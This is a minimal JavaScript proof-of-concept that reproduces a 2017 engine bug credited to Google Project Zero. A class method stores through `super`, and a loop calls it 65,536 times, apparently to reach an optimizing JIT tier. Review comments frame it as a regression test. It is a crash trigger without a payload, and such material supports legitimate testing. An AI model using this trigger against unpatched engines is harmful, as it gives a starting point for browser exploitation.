- Report: Aug 2017
- Fix: Oct 2017
- Credit: lokihardt of Google Project Zero
/**
 * Minimal reproducer class for the issue credited in the header above.
 * The page names neither the affected engine nor a tracking identifier.
 *
 * MyClass has no `extends` clause, yet f() performs a store through `super`.
 */
class MyClass {
  constructor() {
    // Every instance starts with an own data property `arr` holding a
    // three-element array.
    this.arr = [1, 2, 3];
  }

  /**
   * Stores to `arr` through `super`, then reads an unrelated property
   * from `this`.
   */
  f() {
    // Per the language specification, a `super.prop = v` store uses `this` as
    // the receiver. On a conforming engine this therefore replaces the
    // instance's own `arr` with [1] instead of defining a property on the
    // prototype chain.
    super.arr = [1];
    // Property read on `this` directly after the super store. `x` is never
    // defined in this file, so the value is undefined and is discarded.
    // NOTE(review): presumably present so the compiled code touches `this`
    // after the store; the page does not explain it. Keep the statement order
    // unchanged if this file is used as a regression test.
    this.x;
  }
}
// Single instance; every iteration below operates on this same object.
let c = new MyClass();
// Calls f() 0x10000 (65,536) times.
// NOTE(review): the count looks chosen to make f() hot enough for an
// optimizing JIT tier; the page does not state this, so confirm against the
// original report. As a regression test on a patched build, the loop should
// run to completion and leave c.arr as a one-element array [1].
for (let i = 0; i < 0x10000; i++) {
  c.f();
}